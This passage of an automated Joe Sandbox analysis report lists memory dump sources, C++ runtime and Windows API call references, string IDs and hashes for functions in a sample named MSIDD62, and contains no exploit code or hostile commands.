                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 48b295f55f0f1d47bc2d4be45410bdc21de1f6162403a9cc2e7e89a0777af140
                                                                      • Instruction ID: ca295bc982d5305fbd7f6ffc776fe9782d29dac52fd600b0e8c156cf20cd256a
                                                                      • Opcode Fuzzy Hash: 48b295f55f0f1d47bc2d4be45410bdc21de1f6162403a9cc2e7e89a0777af140
                                                                      • Instruction Fuzzy Hash: 1601A731A04625EBCB118F50DC05BEEBBB8FB08B10F00423AE811A2690DF789900CA98
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003FDDD9
                                                                      • collate.LIBCPMT ref: 003FDF54
                                                                      • numpunct.LIBCPMT ref: 003FE1CE
                                                                        • Part of subcall function 003F83C2: __EH_prolog3.LIBCMT ref: 003F83C9
                                                                        • Part of subcall function 003F815A: __EH_prolog3.LIBCMT ref: 003F8161
                                                                        • Part of subcall function 003F815A: std::_Lockit::_Lockit.LIBCPMT ref: 003F816B
                                                                        • Part of subcall function 003F815A: std::_Lockit::~_Lockit.LIBCPMT ref: 003F81DC
                                                                        • Part of subcall function 003EEAF0: std::_Lockit::_Lockit.LIBCPMT ref: 003EEB1D
                                                                        • Part of subcall function 003EEAF0: std::_Lockit::_Lockit.LIBCPMT ref: 003EEB40
                                                                        • Part of subcall function 003EEAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EEB68
                                                                        • Part of subcall function 003EEAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EEC07
                                                                        • Part of subcall function 003F4403: Concurrency::cancel_current_task.LIBCPMT ref: 003F44C6
                                                                        • Part of subcall function 003F764B: __EH_prolog3.LIBCMT ref: 003F7652
                                                                        • Part of subcall function 003F764B: std::_Lockit::_Lockit.LIBCPMT ref: 003F765C
                                                                        • Part of subcall function 003F764B: std::_Lockit::~_Lockit.LIBCPMT ref: 003F76CD
                                                                      • __Getcoll.LIBCPMT ref: 003FDF94
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                        • Part of subcall function 003E84C0: LocalAlloc.KERNEL32(00000040,00000000,0040839D,00000000,755CD0F6,?,00000000,?,00000000,?,0042CB8D,000000FF,?,003E17D5,00000000,0042D3BA), ref: 003E84C6
                                                                        • Part of subcall function 003EB9E0: __Getctype.LIBCPMT ref: 003EB9EB
                                                                        • Part of subcall function 003F7A5E: __EH_prolog3.LIBCMT ref: 003F7A65
                                                                        • Part of subcall function 003F7A5E: std::_Lockit::_Lockit.LIBCPMT ref: 003F7A6F
                                                                        • Part of subcall function 003F7A5E: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7AE0
                                                                        • Part of subcall function 003F7B88: __EH_prolog3.LIBCMT ref: 003F7B8F
                                                                        • Part of subcall function 003F7B88: std::_Lockit::_Lockit.LIBCPMT ref: 003F7B99
                                                                        • Part of subcall function 003F7B88: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7C0A
                                                                        • Part of subcall function 003F7DDC: __EH_prolog3.LIBCMT ref: 003F7DE3
                                                                        • Part of subcall function 003F7DDC: std::_Lockit::_Lockit.LIBCPMT ref: 003F7DED
                                                                        • Part of subcall function 003F7DDC: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7E5E
                                                                        • Part of subcall function 003F7D47: __EH_prolog3.LIBCMT ref: 003F7D4E
                                                                        • Part of subcall function 003F7D47: std::_Lockit::_Lockit.LIBCPMT ref: 003F7D58
                                                                        • Part of subcall function 003F7D47: std::_Lockit::~_Lockit.LIBCPMT ref: 003F7DC9
                                                                        • Part of subcall function 003F4403: __EH_prolog3.LIBCMT ref: 003F440A
                                                                        • Part of subcall function 003F4403: std::_Lockit::_Lockit.LIBCPMT ref: 003F4414
                                                                        • Part of subcall function 003F4403: std::_Lockit::~_Lockit.LIBCPMT ref: 003F44BB
                                                                      • codecvt.LIBCPMT ref: 003FE27F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatenumpunct
                                                                      • String ID:
                                                                      • API String ID: 2252558201-0
                                                                      • Opcode ID: e9c99365e21d274417bab99d6dcaa35352f7bff9ed09569ff8b232c7b3e145ed
                                                                      • Instruction ID: 5d1a78a28138d6482a7f1ed789eafe1eca411c3ba5cbd395479cddb22e353b47
                                                                      • Opcode Fuzzy Hash: e9c99365e21d274417bab99d6dcaa35352f7bff9ed09569ff8b232c7b3e145ed
                                                                      • Instruction Fuzzy Hash: 39E108B1D0022EABDB136F668C0667F7AA9EF51350F11452EFA186F2A1EF308D1097D1
                                                                      APIs
                                                                      • __alloca_probe_16.LIBCMT ref: 0041C409
                                                                      • __alloca_probe_16.LIBCMT ref: 0041C4CA
                                                                      • __freea.LIBCMT ref: 0041C531
                                                                        • Part of subcall function 0041B127: HeapAlloc.KERNEL32(00000000,?,?,?,0041AAAA,?,00000000,?,0040C282,?,?,?,?,?,?,003E1668), ref: 0041B159
                                                                      • __freea.LIBCMT ref: 0041C546
                                                                      • __freea.LIBCMT ref: 0041C556
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                      • String ID:
                                                                      • API String ID: 1096550386-0
                                                                      • Opcode ID: a9eb483e9c2a4daa2c8236f88f8d3e44653b76543464b0ebec26e35f7f213c31
                                                                      • Instruction ID: a81a96a0066873c9551e5f9f05b48dd6ebf7df355bbc9d86fcfb8e7b6b7363af
                                                                      • Opcode Fuzzy Hash: a9eb483e9c2a4daa2c8236f88f8d3e44653b76543464b0ebec26e35f7f213c31
                                                                      • Instruction Fuzzy Hash: BA51B372640226BFEF205F65CCC1EFB36AADF44754B15412AFD08D6241EB38EC9186A9
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,80000022,?,?,?,00000000,?,00000000,?,?), ref: 003E4B05
                                                                      • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,00000000,?,00000000,?,?), ref: 003E4B25
                                                                      • LocalFree.KERNEL32(7FFFFFFE,?,?,00000000,?,00000000,?,?), ref: 003E4BAB
                                                                      • LocalFree.KERNEL32(00000000,755CD0F6,00000000,00000000,Function_000492C0,000000FF,?,?,00000000,?,00000000,?,?), ref: 003E4C2D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocFree
                                                                      • String ID: _B>
                                                                      • API String ID: 2012307162-2609873075
                                                                      • Opcode ID: f34fa173b9a98b792d4a8af78372836ed60bab5d525a3b218214c277f6a832ec
                                                                      • Instruction ID: 2de1b3350c29a7e8bd69dcfe26b75e2a6de1fe4bd190da2f77e1e067941a8ecc
                                                                      • Opcode Fuzzy Hash: f34fa173b9a98b792d4a8af78372836ed60bab5d525a3b218214c277f6a832ec
                                                                      • Instruction Fuzzy Hash: 3451D4726042659FC715DF29DC80A6AB7E9EF88320F110B7EF496D76D1DB70E9008794
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EC5BD
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EC5E0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EC608
                                                                      • std::_Facet_Register.LIBCPMT ref: 003EC67D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EC6A7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 6a8a23382ff9821799d1efdc7dbced7dbe303a7aac9a813a68346e0b746e6fc8
                                                                      • Instruction ID: f58467cb00cdc7d27e817d3d373b13ff58ba8c65001cd0a22d212139365fb6e4
                                                                      • Opcode Fuzzy Hash: 6a8a23382ff9821799d1efdc7dbced7dbe303a7aac9a813a68346e0b746e6fc8
                                                                      • Instruction Fuzzy Hash: 5541E1758106A8DFCF12DF58D841BAEBBB8EF55310F194269E914AB3D2D730AE05CB90
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EEB1D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EEB40
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EEB68
                                                                      • std::_Facet_Register.LIBCPMT ref: 003EEBDD
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EEC07
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 65a30d840753afdf3962787d73144871633143e68577a4456ba798c4d455a8af
                                                                      • Instruction ID: 9bdc9d889f85e8f44b15e926ecc50c981779ab3dca794beff5e030053352f4eb
                                                                      • Opcode Fuzzy Hash: 65a30d840753afdf3962787d73144871633143e68577a4456ba798c4d455a8af
                                                                      • Instruction Fuzzy Hash: A14102758006AADFCB12CF58D840BAEBBB4FB15720F154269E911AB3D1D730AE04CBD1
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EEC5D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EEC80
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EECA8
                                                                      • std::_Facet_Register.LIBCPMT ref: 003EED1D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EED47
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 42c90ea1bae2afb3da25f06e36f0f017c68dc06879491d1a8d88bb6bef5dc66b
                                                                      • Instruction ID: fccea4bee252f726d3f3e9e061a2cebbf2f7e3cb879022b6fdd59a1a39d545e6
                                                                      • Opcode Fuzzy Hash: 42c90ea1bae2afb3da25f06e36f0f017c68dc06879491d1a8d88bb6bef5dc66b
                                                                      • Instruction Fuzzy Hash: 4B41F2758006A9DFCB12CF58D840BAEBBB4FB15720F254669E915AB3D1D730AE04CBD1
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EED9D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EEDC0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EEDE8
                                                                      • std::_Facet_Register.LIBCPMT ref: 003EEE5D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EEE87
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 5d6637c0ef350a7cf54480da6113a8b06af39a9042ed3b5c6186b33cc40c1f6c
                                                                      • Instruction ID: be782f78b857f05a65a3c4a2ab15fd43dafc322604fdaa037af66504f62021e3
                                                                      • Opcode Fuzzy Hash: 5d6637c0ef350a7cf54480da6113a8b06af39a9042ed3b5c6186b33cc40c1f6c
                                                                      • Instruction Fuzzy Hash: 1E4112358006A9DFCB12CF58D880BAEBBB4FB46724F154669E911AB3D1D730AE44CBD1
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000010,00000010,?,003E7912,?,?), ref: 003E7C37
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                      • API String ID: 1452528299-1782174991
                                                                      • Opcode ID: 79efe6e6695009734fc3a6a78e5746046e81cdbddfe8f420322e3fd20832c0d7
                                                                      • Instruction ID: 871c3997bd9ff802e8a30831cf0103079e591890ad857ddaae2b0e23e4c4653a
                                                                      • Opcode Fuzzy Hash: 79efe6e6695009734fc3a6a78e5746046e81cdbddfe8f420322e3fd20832c0d7
                                                                      • Instruction Fuzzy Hash: 61215E49A102A286CB751F3E8400335A2F4EF58745F66596FD9C9D7390E76A8CC28398
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Maklocstr$Maklocchr
                                                                      • String ID:
                                                                      • API String ID: 2020259771-0
                                                                      • Opcode ID: c739c0f014648ad25c53aac11328dfe2944b87461b771100eefe1af00b1a32eb
                                                                      • Instruction ID: 017c55bf730fda4f8fe3a4d62100dc66d2b73d571cb5681f51821be6b2f61c13
                                                                      • Opcode Fuzzy Hash: c739c0f014648ad25c53aac11328dfe2944b87461b771100eefe1af00b1a32eb
                                                                      • Instruction Fuzzy Hash: FB119EB1608749BBE721DBA59881F22B7ECFF08350F04491AF289CBA41D7B5FC5087A4
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F75BD
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F75C7
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • codecvt.LIBCPMT ref: 003F7601
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7618
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7638
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                      • String ID:
                                                                      • API String ID: 712880209-0
                                                                      • Opcode ID: 9906ea01a827c83c24b5d5ef42d951c89ea7261d2c4ba62f588b139434bb2f2a
                                                                      • Instruction ID: 1ac3f3269c9568523e41495462556af425a25e767d2d976873dc87842e3ff163
                                                                      • Opcode Fuzzy Hash: 9906ea01a827c83c24b5d5ef42d951c89ea7261d2c4ba62f588b139434bb2f2a
                                                                      • Instruction Fuzzy Hash: 8201C07590466D9BCF06EBA8D805ABEB761AF95310F240119E611AF3D2DF349E02CB84
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7652
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F765C
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • codecvt.LIBCPMT ref: 003F7696
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F76AD
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F76CD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                      • String ID:
                                                                      • API String ID: 712880209-0
                                                                      • Opcode ID: 52cfae72c2f21bf269ba40245c245283864d1a056582298135b834a750dffa7f
                                                                      • Instruction ID: cc54de523aff93619678fc1c0b2fd2e23b3a92b4bf8052024205505dbb33ac8b
                                                                      • Opcode Fuzzy Hash: 52cfae72c2f21bf269ba40245c245283864d1a056582298135b834a750dffa7f
                                                                      • Instruction Fuzzy Hash: 6101D635904A1D8BCF06EBA4D845ABEB761AF94311F254119E610AF3D2DF349E018BD4
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F777C
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7786
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • collate.LIBCPMT ref: 003F77C0
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F77D7
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F77F7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                      • String ID:
                                                                      • API String ID: 1007100420-0
                                                                      • Opcode ID: b81184a2090bf31599446fd95d618f521e34d05260bd3c6bfb4f541ccaf5a683
                                                                      • Instruction ID: bc20fce5646580ec70c2d8e973435b8653f62bebf9a357bcf522375196cd029c
                                                                      • Opcode Fuzzy Hash: b81184a2090bf31599446fd95d618f521e34d05260bd3c6bfb4f541ccaf5a683
                                                                      • Instruction Fuzzy Hash: F301C07590462DDBCF06EB64D8466BEB771AF84310F24055AE621AB3D2CF349E028BD4
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7811
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F781B
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • ctype.LIBCPMT ref: 003F7855
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F786C
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F788C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                      • String ID:
                                                                      • API String ID: 83828444-0
                                                                      • Opcode ID: 708a94cd5c1a1492011816698d3222fe552cbe03e114d22f59810132ff3bf32e
                                                                      • Instruction ID: c37fa14da52cc098c79c121af19f2f960696fc54704db6017be07d9bf503eaee
                                                                      • Opcode Fuzzy Hash: 708a94cd5c1a1492011816698d3222fe552cbe03e114d22f59810132ff3bf32e
                                                                      • Instruction Fuzzy Hash: 9C01D27590466ECBCF06EBA4D8466BEB771AF84310F24051AE611AF2D2DF349E01CB84
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F78A6
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F78B0
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • messages.LIBCPMT ref: 003F78EA
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7901
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7921
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                      • String ID:
                                                                      • API String ID: 2750803064-0
                                                                      • Opcode ID: 009a2d6cac8c04df60f76784d772327668289a725b676c022f32dad430e67904
                                                                      • Instruction ID: 4ab8399f98a5fb32e2b5ac6ce9b5d18fef834efc0cf7a333f6b1b286bfcbb6e4
                                                                      • Opcode Fuzzy Hash: 009a2d6cac8c04df60f76784d772327668289a725b676c022f32dad430e67904
                                                                      • Instruction Fuzzy Hash: DB01223590022DCBCF02EBA4D8066BEB7A1AF80310F24051DE610AF2D2CF749E01CB84
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F793B
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7945
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • messages.LIBCPMT ref: 003F797F
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7996
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F79B6
                                                                      Memory Dump Source
